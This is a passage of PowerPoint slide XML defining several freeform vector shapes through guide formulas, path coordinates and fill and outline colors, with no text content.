                      <a:pt x="29" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36188" name="Freeform 321"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1323" y="2645"/>
                <a:ext cx="18" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 18"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 13 w 18"/>
                  <a:gd name="T3" fmla="*/ 4 h 44"/>
                  <a:gd name="T4" fmla="*/ 18 w 18"/>
                  <a:gd name="T5" fmla="*/ 2 h 44"/>
                  <a:gd name="T6" fmla="*/ 18 w 18"/>
                  <a:gd name="T7" fmla="*/ 5 h 44"/>
                  <a:gd name="T8" fmla="*/ 15 w 18"/>
                  <a:gd name="T9" fmla="*/ 15 h 44"/>
                  <a:gd name="T10" fmla="*/ 16 w 18"/>
                  <a:gd name="T11" fmla="*/ 17 h 44"/>
                  <a:gd name="T12" fmla="*/ 15 w 18"/>
                  <a:gd name="T13" fmla="*/ 23 h 44"/>
                  <a:gd name="T14" fmla="*/ 16 w 18"/>
                  <a:gd name="T15" fmla="*/ 25 h 44"/>
                  <a:gd name="T16" fmla="*/ 15 w 18"/>
                  <a:gd name="T17" fmla="*/ 28 h 44"/>
                  <a:gd name="T18" fmla="*/ 13 w 18"/>
                  <a:gd name="T19" fmla="*/ 35 h 44"/>
                  <a:gd name="T20" fmla="*/ 11 w 18"/>
                  <a:gd name="T21" fmla="*/ 37 h 44"/>
                  <a:gd name="T22" fmla="*/ 8 w 18"/>
                  <a:gd name="T23" fmla="*/ 37 h 44"/>
                  <a:gd name="T24" fmla="*/ 8 w 18"/>
                  <a:gd name="T25" fmla="*/ 40 h 44"/>
                  <a:gd name="T26" fmla="*/ 5 w 18"/>
                  <a:gd name="T27" fmla="*/ 41 h 44"/>
                  <a:gd name="T28" fmla="*/ 5 w 18"/>
                  <a:gd name="T29" fmla="*/ 43 h 44"/>
                  <a:gd name="T30" fmla="*/ 0 w 18"/>
                  <a:gd name="T31" fmla="*/ 44 h 44"/>
                  <a:gd name="T32" fmla="*/ 1 w 18"/>
                  <a:gd name="T33" fmla="*/ 12 h 44"/>
                  <a:gd name="T34" fmla="*/ 1 w 18"/>
                  <a:gd name="T35" fmla="*/ 9 h 44"/>
                  <a:gd name="T36" fmla="*/ 3 w 18"/>
                  <a:gd name="T37" fmla="*/ 8 h 44"/>
                  <a:gd name="T38" fmla="*/ 6 w 18"/>
                  <a:gd name="T39" fmla="*/ 10 h 44"/>
                  <a:gd name="T40" fmla="*/ 10 w 18"/>
                  <a:gd name="T41" fmla="*/ 4 h 44"/>
                  <a:gd name="T42" fmla="*/ 12 w 18"/>
                  <a:gd name="T43" fmla="*/ 1 h 44"/>
                  <a:gd name="T44" fmla="*/ 15 w 18"/>
                  <a:gd name="T45" fmla="*/ 0 h 44"/>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8"/>
                  <a:gd name="T70" fmla="*/ 0 h 44"/>
                  <a:gd name="T71" fmla="*/ 18 w 18"/>
                  <a:gd name="T72" fmla="*/ 44 h 44"/>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8" h="44">
                    <a:moveTo>
                      <a:pt x="15" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36189" name="Freeform 322"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1323" y="2645"/>
                <a:ext cx="18" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 18"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 13 w 18"/>
                  <a:gd name="T3" fmla="*/ 4 h 44"/>
                  <a:gd name="T4" fmla="*/ 18 w 18"/>
                  <a:gd name="T5" fmla="*/ 2 h 44"/>
                  <a:gd name="T6" fmla="*/ 18 w 18"/>
                  <a:gd name="T7" fmla="*/ 5 h 44"/>
                  <a:gd name="T8" fmla="*/ 15 w 18"/>
                  <a:gd name="T9" fmla="*/ 15 h 44"/>
                  <a:gd name="T10" fmla="*/ 16 w 18"/>
                  <a:gd name="T11" fmla="*/ 17 h 44"/>
                  <a:gd name="T12" fmla="*/ 15 w 18"/>
                  <a:gd name="T13" fmla="*/ 23 h 44"/>
                  <a:gd name="T14" fmla="*/ 16 w 18"/>
                  <a:gd name="T15" fmla="*/ 25 h 44"/>
                  <a:gd name="T16" fmla="*/ 15 w 18"/>
                  <a:gd name="T17" fmla="*/ 28 h 44"/>
                  <a:gd name="T18" fmla="*/ 13 w 18"/>
                  <a:gd name="T19" fmla="*/ 35 h 44"/>
                  <a:gd name="T20" fmla="*/ 11 w 18"/>
                  <a:gd name="T21" fmla="*/ 37 h 44"/>
                  <a:gd name="T22" fmla="*/ 8 w 18"/>
                  <a:gd name="T23" fmla="*/ 37 h 44"/>
                  <a:gd name="T24" fmla="*/ 8 w 18"/>
                  <a:gd name="T25" fmla="*/ 40 h 44"/>
                  <a:gd name="T26" fmla="*/ 5 w 18"/>
                  <a:gd name="T27" fmla="*/ 41 h 44"/>
                  <a:gd name="T28" fmla="*/ 5 w 18"/>
                  <a:gd name="T29" fmla="*/ 43 h 44"/>
                  <a:gd name="T30" fmla="*/ 0 w 18"/>
                  <a:gd name="T31" fmla="*/ 44 h 44"/>
                  <a:gd name="T32" fmla="*/ 1 w 18"/>
                  <a:gd name="T33" fmla="*/ 12 h 44"/>
                  <a:gd name="T34" fmla="*/ 1 w 18"/>
                  <a:gd name="T35" fmla="*/ 9 h 44"/>
                  <a:gd name="T36" fmla="*/ 3 w 18"/>
                  <a:gd name="T37" fmla="*/ 8 h 44"/>
                  <a:gd name="T38" fmla="*/ 6 w 18"/>
                  <a:gd name="T39" fmla="*/ 10 h 44"/>
                  <a:gd name="T40" fmla="*/ 10 w 18"/>
                  <a:gd name="T41" fmla="*/ 4 h 44"/>
                  <a:gd name="T42" fmla="*/ 12 w 18"/>
                  <a:gd name="T43" fmla="*/ 1 h 44"/>
                  <a:gd name="T44" fmla="*/ 15 w 18"/>
                  <a:gd name="T45" fmla="*/ 0 h 44"/>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8"/>
                  <a:gd name="T70" fmla="*/ 0 h 44"/>
                  <a:gd name="T71" fmla="*/ 18 w 18"/>
                  <a:gd name="T72" fmla="*/ 44 h 44"/>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8" h="44">
                    <a:moveTo>
                      <a:pt x="15" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36190" name="Freeform 323"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1395" y="2567"/>
                <a:ext cx="167" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 167"/>
                  <a:gd name="T1" fmla="*/ 13 h 55"/>
                  <a:gd name="T2" fmla="*/ 47 w 167"/>
                  <a:gd name="T3" fmla="*/ 9 h 55"/>
                  <a:gd name="T4" fmla="*/ 42 w 167"/>
                  <a:gd name="T5" fmla="*/ 7 h 55"/>
                  <a:gd name="T6" fmla="*/ 34 w 167"/>
                  <a:gd name="T7" fmla="*/ 7 h 55"/>
                  <a:gd name="T8" fmla="*/ 21 w 167"/>
                  <a:gd name="T9" fmla="*/ 15 h 55"/>
                  <a:gd name="T10" fmla="*/ 13 w 167"/>
                  <a:gd name="T11" fmla="*/ 16 h 55"/>
                  <a:gd name="T12" fmla="*/ 11 w 167"/>
                  <a:gd name="T13" fmla="*/ 20 h 55"/>
                  <a:gd name="T14" fmla="*/ 5 w 167"/>
                  <a:gd name="T15" fmla="*/ 23 h 55"/>
                  <a:gd name="T16" fmla="*/ 2 w 167"/>
                  <a:gd name="T17" fmla="*/ 21 h 55"/>
                  <a:gd name="T18" fmla="*/ 4 w 167"/>
                  <a:gd name="T19" fmla="*/ 14 h 55"/>
                  <a:gd name="T20" fmla="*/ 7 w 167"/>
                  <a:gd name="T21" fmla="*/ 10 h 55"/>
                  <a:gd name="T22" fmla="*/ 28 w 167"/>
                  <a:gd name="T23" fmla="*/ 2 h 55"/>
                  <a:gd name="T24" fmla="*/ 42 w 167"/>
                  <a:gd name="T25" fmla="*/ 0 h 55"/>
                  <a:gd name="T26" fmla="*/ 52 w 167"/>
                  <a:gd name="T27" fmla="*/ 0 h 55"/>
                  <a:gd name="T28" fmla="*/ 63 w 167"/>
                  <a:gd name="T29" fmla="*/ 2 h 55"/>
                  <a:gd name="T30" fmla="*/ 72 w 167"/>
                  <a:gd name="T31" fmla="*/ 4 h 55"/>
                  <a:gd name="T32" fmla="*/ 79 w 167"/>
                  <a:gd name="T33" fmla="*/ 6 h 55"/>
                  <a:gd name="T34" fmla="*/ 85 w 167"/>
                  <a:gd name="T35" fmla="*/ 12 h 55"/>
                  <a:gd name="T36" fmla="*/ 95 w 167"/>
                  <a:gd name="T37" fmla="*/ 15 h 55"/>
                  <a:gd name="T38" fmla="*/ 111 w 167"/>
                  <a:gd name="T39" fmla="*/ 21 h 55"/>
                  <a:gd name="T40" fmla="*/ 117 w 167"/>
                  <a:gd name="T41" fmla="*/ 28 h 55"/>
                  <a:gd name="T42" fmla="*/ 123 w 167"/>
                  <a:gd name="T43" fmla="*/ 29 h 55"/>
                  <a:gd name="T44" fmla="*/ 142 w 167"/>
                  <a:gd name="T45" fmla="*/ 34 h 55"/>
                  <a:gd name="T46" fmla="*/ 142 w 167"/>
                  <a:gd name="T47" fmla="*/ 41 h 55"/>
                  <a:gd name="T48" fmla="*/ 148 w 167"/>
                  <a:gd name="T49" fmla="*/ 42 h 55"/>
                  <a:gd name="T50" fmla="*/ 156 w 167"/>
                  <a:gd name="T51" fmla="*/ 43 h 55"/>
                  <a:gd name="T52" fmla="*/ 164 w 167"/>
                  <a:gd name="T53" fmla="*/ 48 h 55"/>
                  <a:gd name="T54" fmla="*/ 165 w 167"/>
                  <a:gd name="T55" fmla="*/ 51 h 55"/>
                  <a:gd name="T56" fmla="*/ 150 w 167"/>
                  <a:gd name="T57" fmla="*/ 54 h 55"/>
                  <a:gd name="T58" fmla="*/ 138 w 167"/>
                  <a:gd name="T59" fmla="*/ 53 h 55"/>
                  <a:gd name="T60" fmla="*/ 125 w 167"/>
                  <a:gd name="T61" fmla="*/ 54 h 55"/>
                  <a:gd name="T62" fmla="*/ 115 w 167"/>
                  <a:gd name="T63" fmla="*/ 55 h 55"/>
                  <a:gd name="T64" fmla="*/ 114 w 167"/>
                  <a:gd name="T65" fmla="*/ 52 h 55"/>
                  <a:gd name="T66" fmla="*/ 121 w 167"/>
                  <a:gd name="T67" fmla="*/ 44 h 55"/>
                  <a:gd name="T68" fmla="*/ 118 w 167"/>
                  <a:gd name="T69" fmla="*/ 41 h 55"/>
                  <a:gd name="T70" fmla="*/ 108 w 167"/>
                  <a:gd name="T71" fmla="*/ 40 h 55"/>
                  <a:gd name="T72" fmla="*/ 99 w 167"/>
                  <a:gd name="T73" fmla="*/ 37 h 55"/>
                  <a:gd name="T74" fmla="*/ 96 w 167"/>
                  <a:gd name="T75" fmla="*/ 27 h 55"/>
                  <a:gd name="T76" fmla="*/ 92 w 167"/>
                  <a:gd name="T77" fmla="*/ 26 h 55"/>
                  <a:gd name="T78" fmla="*/ 79 w 167"/>
                  <a:gd name="T79" fmla="*/ 25 h 55"/>
                  <a:gd name="T80" fmla="*/ 68 w 167"/>
                  <a:gd name="T81" fmla="*/ 19 h 55"/>
                  <a:gd name="T82" fmla="*/ 58 w 167"/>
                  <a:gd name="T83" fmla="*/ 17 h 55"/>
                  <a:gd name="T84" fmla="*/ 46 w 167"/>
                  <a:gd name="T85" fmla="*/ 16 h 55"/>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67"/>
                  <a:gd name="T130" fmla="*/ 0 h 55"/>
                  <a:gd name="T131" fmla="*/ 167 w 167"/>
                  <a:gd name="T132" fmla="*/ 55 h 55"/>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67" h="55">
                    <a:moveTo>
                      <a:pt x="40" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="42" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="13"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36191" name="Freeform 324"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1395" y="2567"/>
                <a:ext cx="167" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 167"/>
                  <a:gd name="T1" fmla="*/ 13 h 55"/>
                  <a:gd name="T2" fmla="*/ 47 w 167"/>
                  <a:gd name="T3" fmla="*/ 9 h 55"/>
                  <a:gd name="T4" fmla="*/ 42 w 167"/>
                  <a:gd name="T5" fmla="*/ 7 h 55"/>
                  <a:gd name="T6" fmla="*/ 34 w 167"/>
                  <a:gd name="T7" fmla="*/ 7 h 55"/>
                  <a:gd name="T8" fmla="*/ 21 w 167"/>
                  <a:gd name="T9" fmla="*/ 15 h 55"/>
                  <a:gd name="T10" fmla="*/ 13 w 167"/>
                  <a:gd name="T11" fmla="*/ 16 h 55"/>
                  <a:gd name="T12" fmla="*/ 11 w 167"/>
                  <a:gd name="T13" fmla="*/ 20 h 55"/>
                  <a:gd name="T14" fmla="*/ 5 w 167"/>
                  <a:gd name="T15" fmla="*/ 23 h 55"/>
                  <a:gd name="T16" fmla="*/ 2 w 167"/>
                  <a:gd name="T17" fmla="*/ 21 h 55"/>
                  <a:gd name="T18" fmla="*/ 4 w 167"/>
                  <a:gd name="T19" fmla="*/ 14 h 55"/>
                  <a:gd name="T20" fmla="*/ 7 w 167"/>
                  <a:gd name="T21" fmla="*/ 10 h 55"/>
                  <a:gd name="T22" fmla="*/ 28 w 167"/>
                  <a:gd name="T23" fmla="*/ 2 h 55"/>
                  <a:gd name="T24" fmla="*/ 42 w 167"/>
                  <a:gd name="T25" fmla="*/ 0 h 55"/>
                  <a:gd name="T26" fmla="*/ 52 w 167"/>
                  <a:gd name="T27" fmla="*/ 0 h 55"/>
                  <a:gd name="T28" fmla="*/ 63 w 167"/>
                  <a:gd name="T29" fmla="*/ 2 h 55"/>
                  <a:gd name="T30" fmla="*/ 72 w 167"/>
                  <a:gd name="T31" fmla="*/ 4 h 55"/>
                  <a:gd name="T32" fmla="*/ 79 w 167"/>
                  <a:gd name="T33" fmla="*/ 6 h 55"/>
                  <a:gd name="T34" fmla="*/ 85 w 167"/>
                  <a:gd name="T35" fmla="*/ 12 h 55"/>
                  <a:gd name="T36" fmla="*/ 95 w 167"/>
                  <a:gd name="T37" fmla="*/ 15 h 55"/>
                  <a:gd name="T38" fmla="*/ 111 w 167"/>
                  <a:gd name="T39" fmla="*/ 21 h 55"/>
                  <a:gd name="T40" fmla="*/ 117 w 167"/>
                  <a:gd name="T41" fmla="*/ 28 h 55"/>
                  <a:gd name="T42" fmla="*/ 123 w 167"/>
                  <a:gd name="T43" fmla="*/ 29 h 55"/>
                  <a:gd name="T44" fmla="*/ 142 w 167"/>
                  <a:gd name="T45" fmla="*/ 34 h 55"/>
                  <a:gd name="T46" fmla="*/ 142 w 167"/>
                  <a:gd name="T47" fmla="*/ 41 h 55"/>
                  <a:gd name="T48" fmla="*/ 148 w 167"/>
                  <a:gd name="T49" fmla="*/ 42 h 55"/>
                  <a:gd name="T50" fmla="*/ 156 w 167"/>
                  <a:gd name="T51" fmla="*/ 43 h 55"/>
                  <a:gd name="T52" fmla="*/ 164 w 167"/>
                  <a:gd name="T53" fmla="*/ 48 h 55"/>
                  <a:gd name="T54" fmla="*/ 165 w 167"/>
                  <a:gd name="T55" fmla="*/ 51 h 55"/>
                  <a:gd name="T56" fmla="*/ 150 w 167"/>
                  <a:gd name="T57" fmla="*/ 54 h 55"/>
                  <a:gd name="T58" fmla="*/ 138 w 167"/>
                  <a:gd name="T59" fmla="*/ 53 h 55"/>
                  <a:gd name="T60" fmla="*/ 125 w 167"/>
                  <a:gd name="T61" fmla="*/ 54 h 55"/>
                  <a:gd name="T62" fmla="*/ 115 w 167"/>
                  <a:gd name="T63" fmla="*/ 55 h 55"/>
                  <a:gd name="T64" fmla="*/ 114 w 167"/>
                  <a:gd name="T65" fmla="*/ 52 h 55"/>
                  <a:gd name="T66" fmla="*/ 121 w 167"/>
                  <a:gd name="T67" fmla="*/ 44 h 55"/>
                  <a:gd name="T68" fmla="*/ 118 w 167"/>
                  <a:gd name="T69" fmla="*/ 41 h 55"/>
                  <a:gd name="T70" fmla="*/ 108 w 167"/>
                  <a:gd name="T71" fmla="*/ 40 h 55"/>
                  <a:gd name="T72" fmla="*/ 99 w 167"/>
                  <a:gd name="T73" fmla="*/ 37 h 55"/>
                  <a:gd name="T74" fmla="*/ 96 w 167"/>
